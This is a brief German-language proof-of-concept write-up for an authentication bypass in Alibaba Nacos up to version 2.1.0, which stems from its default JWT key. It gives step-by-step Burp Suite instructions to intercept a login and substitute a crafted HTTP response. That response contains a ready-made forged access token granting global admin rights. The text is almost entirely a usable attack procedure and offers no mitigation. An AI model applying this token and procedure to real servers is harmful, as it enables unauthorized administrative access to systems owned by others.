
Alibab Nacos Unauthorized Login
In Nacos wurde ein Problem entdeckt, das Nacos <= 2.1.0 betrifft. Nacos-Benutzer verwenden den Standard-JWT-Schlüssel, was zu einer Schwachstelle für unbefugten Zugriff führt. Durch diese Schwachstelle können Angreifer die Benutzername- und Passwort-Authentifizierung umgehen und sich direkt beim Nacos-Benutzer anmelden.
Nacos-Version <= 2.1.0
Schritt 1:Gehen Sie direkt zur Nacos-Website, geben Sie einen beliebigen Benutzernamen und ein beliebiges Passwort ein und verwenden Sie Burpsuite, um das Paket abzufangen.

Schritt 2:Fangen Sie das Antwortpaket ab.

Schritt 3: Ändern Sie das Datenpaket wie folgt
HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb
{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

Schritt 4: Melden Sie sich nach dem Freigeben des Datenpakets erfolgreich an.
